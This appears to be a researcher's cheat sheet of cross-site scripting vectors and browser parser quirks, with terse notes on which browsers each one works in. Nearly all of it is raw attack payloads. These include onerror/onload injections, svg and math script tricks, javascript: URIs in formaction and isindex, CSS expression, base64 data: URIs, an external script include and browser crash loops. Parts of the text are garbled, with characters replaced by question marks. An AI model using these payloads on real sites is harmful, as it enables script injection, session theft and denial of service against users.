<!– " –!><input value="><img src=xx:x onerror=alert(1)//"> <script/onload=alert(1)></script> IE9 <style/onload=alert(1)> alert([0x0D]–>[0x0D]1<!–[0x0D]) 1<!–i document.write(\'<img src="<iframe/onload=alert(1)>\\0">\’); IE8 JSON.parse(\'{"__proto__":["a",1]}\’) location++ IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊) alert(\’aaa\\0bbb\’) IE only show aaa http://jsbin.com/emekog <svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera Function(\’alert(arguments.callee.caller)\’)() firefox dos? while(1)find(); <div/style=x:expression(alert(URL=1))> Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode! <applet code=javascript:alert(\’sgl\’)> and <embed src=javascript:alert(\’sgl\’)> umm…cute FF! <math><script>sgl=\'<img/src=xx:x onerror=alert(1)>\'</script> chrome firefox opera vector <svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~ <body/onload=\\\\\\vbs\\\\\\::::::::alert+\’x\’+[000000]+\’o\’+\’x\’+[000000]::::::::> vbs:alert+-[] <body/onload=vbs::::::::alert—-+–+—-1:::::::::> Firefox vector <math><a xlink:href="//mmme.me">click <svg><script>a=\'<svg/onload=alert(1)></svg>\’;alert(2)</script> Inj>> <script/src=//0.gg/xxxxx> << <script>…</script> less xss [code]Webkit X-XSS-Protection header is enabled just now 😛 <svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/ <?xml encoding="><svg/onload=alert(1)// >"> <a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IE Also <a `="<img/onerror=alert(1) src=xx:xx>\’></h1>">x</a> <h1 "=\'<img/onerror=alert(1) src=xx:xx>\’></h1> IE only <1h name="<svg/onload=alert(1)>"></1h> <img ="1 src=xxx:x onerror=alert(1)//" > works in not-IE javascript=1;for(javascript in RuntimeObject());javascript==\’javascript\’ <body/onerror=alert(event)><img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sanbox object <img src=\’javascript:while([{}]);\’> works in firefox for(x in document.open); Crash your IE 6:> localStorage.setItem(\’setItem\’,1) Only to find \’?\’.toUpperCase()===\’?\’.toUpperCase() J? H? T? W? Y? i? length==2 \’?\’.toUpperCase()==\’I\’ Also \’?\’.toUpperCase()==\’SS\’ \’?.toUpperCase() ==\’FF\’// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST #Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>> Firefox always the most cute data:_,<script>alert(1)</script> <a href="ftp:/baidu.com">xx</a> http://?????????? works in Firefox RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else? location=\’javascript:alert(1)\’ for({} in {}); 興味深いhttp://jsbin.com/inekab for Opera only <a href=https:http://www.google.com>x</a> That\’s a relative path? document.frames==window.frames <a href="jar:xxx" id=x></a> x.protocol==\’http:\’ on #firefox (0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode 😀 127.0×000000001==127.0.0.1 <input value="sefewfewf"/> Chrome input value block <svg><xmp><img/onerror=alert(1) src=xxx:x /> <img src/="><img src=xxx:x onerror=alert(1)//"> 有趣的isindex <isindex formaction=javascript:alert(1) type=submit > chrome:xx – >chrome://crash/ crash? <form action=javascript:alert(1) /><input> Chrome input enter fucked! <form/><button/><keygen/> chrome send empty key,is funny~_~ <form/><input/formaction=javascript:alert(1)> Because <form> not a void element.[/code [code]<form><input/name="isindex"> when name are isindex does not send key. <form id=x ></form><button form=x formaction="javascript:alert(1)">X It like http://html5sec.org/#1 but only chrome support . <script language="php">echo 1 ?> Fascinating. fvck:for(_?in?this)_[\’match\’](/.Element$/)&&console.log(_) location.reload(\’javascript:alert(1)\’) //ie only,lol~ {}alert(1) Twitter @jackmasa =P
